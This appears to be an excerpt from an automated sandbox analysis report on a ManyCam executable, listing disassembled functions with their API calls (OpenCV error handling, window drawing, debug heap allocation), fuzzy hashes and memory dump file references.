Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: ErrorStatus
String ID: .\cxdatastructs.cpp$NULL iterator pointer$cvNextTreeNode
API String ID: 1596131371-2656122608
Opcode ID: 7dab27300cd174e55a9ac98605eff9031608dc8cdd837004750cac9e56fce1bd
Instruction ID: 4647830bff9bdb792555ce36137f4a2ca048013ed9a21393fbe774ecb37e5b67
Opcode Fuzzy Hash: 7dab27300cd174e55a9ac98605eff9031608dc8cdd837004750cac9e56fce1bd
Instruction Fuzzy Hash: 681182363483018FDB288E1AF440A56F3D5EBD0724B2889AED04997241C672A886CE50

Function 00C220C9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

cvNextNArraySlice.GLU32(?), ref: 00C22106
cvError.GLU32(FFFFFF2E,cvNorm,00C4124F,.\cxnorm.cpp,000004BC), ref: 00C22153
cvErrorFromIppStatus.GLU32(00000000,cvNorm,OpenCV function failed,.\cxnorm.cpp,000004B0), ref: 00C2217B
cvError.GLU32(00000000), ref: 00C22184

Strings

.\cxnorm.cpp, xrefs: 00C2213F
cvNorm, xrefs: 00C22149

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$ArrayFromNextSliceStatus
String ID: .\cxnorm.cpp$cvNorm
API String ID: 1688085075-318670674
Opcode ID: 3e53a1b06c368bf85afd52b54ee6703c4f75f1e3bf6c97f4df2dc4ca22b31b8e
Instruction ID: f3e25531b24a6f9687bb6ae090963cb668380c6a1d014263b40f58a000cc31e9
Opcode Fuzzy Hash: 3e53a1b06c368bf85afd52b54ee6703c4f75f1e3bf6c97f4df2dc4ca22b31b8e
Instruction Fuzzy Hash: AB01F172608325ABD7208A14FC40B2FB7E4FBC4714F004A2CF99453290D372EA64CB82

Function 00BC6810 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

cvGetSeqElem.GLU32(?,?), ref: 00BC681B
cvError.GLU32(000000E5,cvSetRemove,00C4124F,.\cxdatastructs.cpp,00000B19), ref: 00BC6865

Strings

cvSetRemove, xrefs: 00BC685E
.\cxdatastructs.cpp, xrefs: 00BC6854

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: ElemError
String ID: .\cxdatastructs.cpp$cvSetRemove
API String ID: 3264412860-782276712
Opcode ID: befeb2b47271f40e148cf6dfccce071683d9d3561be25d2cfc101cc76b815198
Instruction ID: f640e17db3aaa3049cf546430492f29dce467390c563ab322fd875cb30b58664
Opcode Fuzzy Hash: befeb2b47271f40e148cf6dfccce071683d9d3561be25d2cfc101cc76b815198
Instruction Fuzzy Hash: C4F0E271940710AFC7219B05EC52F923BE5EF82B20F0543ADF851AB6E1C374F8818BA0

Function 00BC7080 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

cvError.GLU32(FFFFFF2D,icvInitTreeNodeIterator,00C4124F,.\cxdatastructs.cpp,00000F2F), ref: 00BC70B1

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvError.GLU32(000000E5,icvInitTreeNodeIterator,00C4124F,.\cxdatastructs.cpp,00000F2C), ref: 00BC70DD

Strings

icvInitTreeNodeIterator, xrefs: 00BC70A7, 00BC70D6
.\cxdatastructs.cpp, xrefs: 00BC709D, 00BC70CC

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status
String ID: .\cxdatastructs.cpp$icvInitTreeNodeIterator
API String ID: 483703942-1516140079
Opcode ID: b32e0bb57edb492d7f4cb4071219e86dc55b2f60fa03d886d21773af973b9e99
Instruction ID: c01be8185893195a1f8825a1f739e1e29c176a40d7d661d6ef0172e72f690ed8
Opcode Fuzzy Hash: b32e0bb57edb492d7f4cb4071219e86dc55b2f60fa03d886d21773af973b9e99
Instruction Fuzzy Hash: 2CF0A7B07C434226CB185B168C43F1676D2BF90F05F4985BCB455972E2E7B0D4009611

Function 00418380 Relevance: 6.3, APIs: 4, Instructions: 316windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 004186F4

Part of subcall function 00408360: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004083C6
Part of subcall function 00408360: CompareStringW.KERNEL32(00000400,00000001,?,00000003,<A>,00000003), ref: 00408424
Part of subcall function 00408360: CompareStringW.KERNEL32(00000400,00000001,?,00000004,</A>,00000004), ref: 00408474

Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1

Part of subcall function 00418A60: SetBkMode.GDI32(?,00000001), ref: 00418A71

Part of subcall function 00418A40: SelectObject.GDI32(?,?), ref: 00418A51

GetSysColor.USER32(00000011), ref: 004184AA

Part of subcall function 00418810: DeleteDC.GDI32(00000000), ref: 00418824

GetFocus.USER32 ref: 0041858A

Part of subcall function 00418AF0: DrawTextW.USER32(00000000,?,00000000,?,000000FF), ref: 00418B0D

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: CompareFocusString$ClientColorDeleteDrawModeObjectRectSelectTextlstrlen
String ID:
API String ID: 1926319676-0
Opcode ID: 26e55d2ddd3d839f70efe0ddea58adb9d72dd7b4482a26fa95ec74e06393aeaf
Instruction ID: 8fd3581a3690b51667abaed722c69e7692ca1fee28cda492897b23429118541a
Opcode Fuzzy Hash: 26e55d2ddd3d839f70efe0ddea58adb9d72dd7b4482a26fa95ec74e06393aeaf
Instruction Fuzzy Hash: DCD1FA719002089FDB08DF95C891AEEBBB5FF48344F14811EE5166B392DF39A985CF94

Function 00C0CA83 Relevance: 6.3, APIs: 4, Instructions: 251COMMON

Download Yara Rule

APIs

_CIsqrt.MSVCR80 ref: 00C0CCDD
_CIsqrt.MSVCR80 ref: 00C0CD23
_CIsqrt.MSVCR80 ref: 00C0CD5F
_CIsqrt.MSVCR80 ref: 00C0CD75

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Isqrt
String ID:
API String ID: 4112084577-0
Opcode ID: cf7147b1bd8d03d9dff7909f9bc0bb26773737bf4bc2b279fe2357b5b81f14d1
Instruction ID: ac2d94e1f1c8efdf2de96c9a7111902410ed4bf7b6acc171ecba5af7b0a20695
Opcode Fuzzy Hash: cf7147b1bd8d03d9dff7909f9bc0bb26773737bf4bc2b279fe2357b5b81f14d1
Instruction Fuzzy Hash: E7A122B1A083409BC355DF2AC58015AFBF5FFD4350F618E1EF9A492260E7718A45CF82

Function 00C0C019 Relevance: 6.2, APIs: 4, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ae3a60d75bdf5cfdf41a42cf612f876b542a3b6f34ebf8e21bf45ef07f3f7bc
Instruction ID: 61e401aec95fa5de359dac62e3fd496773f5f6cc893e0f7f9ca31e6c7c7fc9c7
Opcode Fuzzy Hash: 0ae3a60d75bdf5cfdf41a42cf612f876b542a3b6f34ebf8e21bf45ef07f3f7bc
Instruction Fuzzy Hash: 3191557190C3418BC3A4AF55C18028AF7F1FBC4760F618E2EE9D5922A1EB798D55DF82

Function 004731C0 Relevance: 6.2, APIs: 4, Instructions: 177memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 0047326B
_DebugHeapAllocator.LIBCPMTD ref: 004732C6

Part of subcall function 0040EDB0: _DebugHeapAllocator.LIBCPMTD ref: 0040EDE7

_DebugHeapAllocator.LIBCPMTD ref: 00473373
_DebugHeapAllocator.LIBCPMTD ref: 004733BF

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap
String ID:
API String ID: 571936431-0
Opcode ID: 8d22956a6eca960c08d3dff8719a7386b74edfd0f08a11446174f923434c786a
Instruction ID: ba553dcd13a5858e603f1fb76aea40c35e3a739926aa5d8f94fbf40c4e6c359d
Opcode Fuzzy Hash: 8d22956a6eca960c08d3dff8719a7386b74edfd0f08a11446174f923434c786a
Instruction Fuzzy Hash: 38716C71D04248EFCB08EFA5C891BEEBBB1AF44304F10856EE416BB2D1DB385A05CB94

Function 004377F0 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 00437873

Part of subcall function 004DB530: _DebugHeapAllocator.LIBCPMTD ref: 004DB54A

Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 00437893
Concurrency::task_options::get_scheduler.LIBCPMTD ref: 00437911
Concurrency::task_options::get_scheduler.LIBCPMTD ref: 00437931

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Base::Concurrency::details::Concurrency::task_options::get_schedulerPolicyScheduler$AllocatorDebugHeap
String ID:
API String ID: 3769596188-0
Opcode ID: ae50dedc5bff3189a4c5ee1f5f7d387c5ef5596cba0e4c588fdb73d77bb84b94
Instruction ID: e04cd424ada27803d4de57edeb00dc09ccd5da108a2e1a4cd45ff0b3344883ed
Opcode Fuzzy Hash: ae50dedc5bff3189a4c5ee1f5f7d387c5ef5596cba0e4c588fdb73d77bb84b94
Instruction Fuzzy Hash: 2551C9B1D052089BCB08EFD5D851AEEBBB5EF48304F10816EE415AB391DB386905CB95

Function 005128B0 Relevance: 6.1, APIs: 4, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 005128FB
_DebugHeapAllocator.LIBCPMTD ref: 0051292B
_DebugHeapAllocator.LIBCPMTD ref: 00512953
_DebugHeapAllocator.LIBCPMTD ref: 0051297B

Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB139
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB155
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB171
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1A3
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1D6

Part of subcall function 0050E580: wcscpy.MSVCR80 ref: 0050E5EC
Part of subcall function 0050E580: wcscpy.MSVCR80 ref: 0050E623

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$wcscpy
String ID:
API String ID: 147117728-0
Opcode ID: d0bbc9be73f287d5b3265cda2ea85270813d23556e8a0590b6fb4fd8d4f8cf1c
Instruction ID: 4db675f979ab1b4fcf933bf1fc0f7ec6c4e65dab18244cadebc46eb2865c177d
Opcode Fuzzy Hash: d0bbc9be73f287d5b3265cda2ea85270813d23556e8a0590b6fb4fd8d4f8cf1c
Instruction Fuzzy Hash: FF512AB0906259DFEB14DF58D899BAEBBB5BF48304F1042EDE409A7281C7385E44CF95

Function 004DBFF0 Relevance: 6.1, APIs: 4, Instructions: 119memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 004DC033

Part of subcall function 004DBE90: _DebugHeapAllocator.LIBCPMTD ref: 004DBEC9

_DebugHeapAllocator.LIBCPMTD ref: 004DC086

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap
String ID:
API String ID: 571936431-0
Opcode ID: c59892185d700c258966fea98a3a67c139e76443b60bb6cbe48b80099f68f78a
Instruction ID: 57ad7a94b4f17953cceabe80b37dddf1255517824b701b9908fe33c64e9df595
Opcode Fuzzy Hash: c59892185d700c258966fea98a3a67c139e76443b60bb6cbe48b80099f68f78a
Instruction Fuzzy Hash: 855108B1D01209EFCB04DF98D991BEEBBB5EF48314F20821EE415A7381D7786A05CBA5

Function 00424150 Relevance: 6.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA40: GetWindowLongW.USER32(?,744843B1), ref: 0041AA51

Part of subcall function 0041E880: SetWindowLongW.USER32(744843B1,00000001,744843B1), ref: 0041E895

memset.MSVCR80 ref: 00424199

Part of subcall function 00424C20: SendMessageW.USER32(?,00000418,00000000,?), ref: 00424C38

memset.MSVCR80 ref: 0042420A

Part of subcall function 00424CB0: SendMessageW.USER32(?,00000432,00000000,004234AC), ref: 00424CC8

GetSysColor.USER32(0000000D), ref: 00424246

Part of subcall function 00424C50: SendMessageW.USER32(?,00000413,00000000,00000000), ref: 00424C68

GetSysColor.USER32(0000000E), ref: 0042425A

Part of subcall function 00424C80: SendMessageW.USER32(?,00000414,00000000,00000000), ref: 00424C98

Part of subcall function 00424BF0: SendMessageW.USER32(?,0000041A,00000000,00000000), ref: 00424C08

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: MessageSend$ColorLongWindowmemset
String ID:
API String ID: 364163598-0
Opcode ID: ca4f91228ccd88ec06df88587eba8f35eadc2edbafeba585f7b4b6ebc1d4d150
Instruction ID: b7621caee83b87087722d0fc06bec11bb6e010a42a84f963952b34725cf3772b
Opcode Fuzzy Hash: ca4f91228ccd88ec06df88587eba8f35eadc2edbafeba585f7b4b6ebc1d4d150
Instruction Fuzzy Hash: 5D410EB0A451289BDB04DB99DCA1FADBB75BF8C714F14021DF505BB3C2CA78A450CB69

Function 004DBE90 Relevance: 6.1, APIs: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 004DBEC9

Part of subcall function 004DBD20: Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 004DBD89

??2@YAPAXI@Z.MSVCR80(00000020,00000000,?,744843B1,?,?,?,?,?,?,00000000,005360A4,000000FF,?,004DC043,?), ref: 004DBF07
_DebugHeapAllocator.LIBCPMTD ref: 004DBF32
codecvt.LIBCPMTD ref: 004DBF91

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$??2@Base::Concurrency::details::PolicySchedulercodecvt
String ID:
API String ID: 2274784594-0
Opcode ID: b34eaf5f8b4bc995a75b7663f0490cbbca256718e0fc2991ba0d564274ad3819
Instruction ID: a5f5fe00beb6dc335f7db01107ea1e8339e23b863d8d973fd5a3badf8319c300
Opcode Fuzzy Hash: b34eaf5f8b4bc995a75b7663f0490cbbca256718e0fc2991ba0d564274ad3819
Instruction Fuzzy Hash: 4241C3B1D00209EFCB04DF99D855BEEBBB5FB48314F10822EE825A7380D7786A41CB95

Function 004CB670 Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 004CB6AA

Part of subcall function 004CDD10: _DebugHeapAllocator.LIBCPMTD ref: 004CDD47

_DebugHeapAllocator.LIBCPMTD ref: 004CB711
_DebugHeapAllocator.LIBCPMTD ref: 004CB76F
_DebugHeapAllocator.LIBCPMTD ref: 004CB787

Part of subcall function 0040EDB0: _DebugHeapAllocator.LIBCPMTD ref: 0040EDE7

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap
String ID:
API String ID: 571936431-0
Opcode ID: d8dd091d62933aa0e0d22cb533b24b345fb768a8967b578f071013b0fdbbec97
Instruction ID: 38e3a450d274fc90888437ce31c1c227629e1880207a410873065ac097306c4e
Opcode Fuzzy Hash: d8dd091d62933aa0e0d22cb533b24b345fb768a8967b578f071013b0fdbbec97
Instruction Fuzzy Hash: 9B411771D01109EFDB04EFA5C992BEEBBB4AF14304F10852EE512B72D1DB746A08CBA5

Function 004233E0 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 0040DB90: EnableWindow.USER32(?,004233F6), ref: 0040DBA1

memset.MSVCR80 ref: 00423401

Part of subcall function 00424C20: SendMessageW.USER32(?,00000418,00000000,?), ref: 00424C38

memset.MSVCR80 ref: 00423472

Part of subcall function 00424CB0: SendMessageW.USER32(?,00000432,00000000,004234AC), ref: 00424CC8

GetSysColor.USER32(0000000D), ref: 004234AE

Part of subcall function 00424C50: SendMessageW.USER32(?,00000413,00000000,00000000), ref: 00424C68

GetSysColor.USER32(0000000E), ref: 004234C2

Part of subcall function 00424C80: SendMessageW.USER32(?,00000414,00000000,00000000), ref: 00424C98

Part of subcall function 00424BF0: SendMessageW.USER32(?,0000041A,00000000,00000000), ref: 00424C08

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: MessageSend$Colormemset$EnableWindow
String ID:
API String ID: 3254005938-0
Opcode ID: 9547226adb342bfd39b01646857f65c79a1ef8127a810dff08a050f6dd987676
Instruction ID: 106a6f500417accf57ea954c1e823afec406d325b5afcb2095aae49042dfd20f
Opcode Fuzzy Hash: 9547226adb342bfd39b01646857f65c79a1ef8127a810dff08a050f6dd987676
Instruction Fuzzy Hash: FF311270E441069BDB04DB99DCA2F7EB7B5AF88708F04811DF5157B3C2CA78A416CB69

Function 00406040 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

_CIsqrt.MSVCR80 ref: 00406080
_CIatan.MSVCR80 ref: 004060E0
_CIatan.MSVCR80 ref: 00406102
_CIatan.MSVCR80 ref: 00406126

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Iatan$Isqrt
String ID:
API String ID: 1025909456-0
Opcode ID: 57f5941b643651e987862c1e0d1d6f7d17b30a8860795f25dd51119af805d3df
Instruction ID: 369849f07fd1038270b353e5a516803fc2d99b3ba7736fd5bc0cfa9b85f71fc3
Opcode Fuzzy Hash: 57f5941b643651e987862c1e0d1d6f7d17b30a8860795f25dd51119af805d3df
Instruction Fuzzy Hash: 8631E671609302EFC701AF44E64816ABFA4FFC1751FA18D88E4E922199D73198758F8B

Function 00403480 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

cvPyrDown.CV099(?,?,00000007,FFFFFFFE,?,?,?,0040176B,?,?), ref: 004034E8
cvPyrDown.CV099(?,?,00000007,?,?,00000007,FFFFFFFE,?,?,?,0040176B,?,?), ref: 004034F7
cvSobel.CV099(?,?,00000001,00000000,00000003,?,?,00000007,?,?,00000007,FFFFFFFE,?,?,?,0040176B), ref: 0040350A
cvSobel.CV099(?,?,00000000,00000001,00000003,?,?,00000001,00000000,00000003,?,?,00000007,?,?,00000007), ref: 0040351D

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

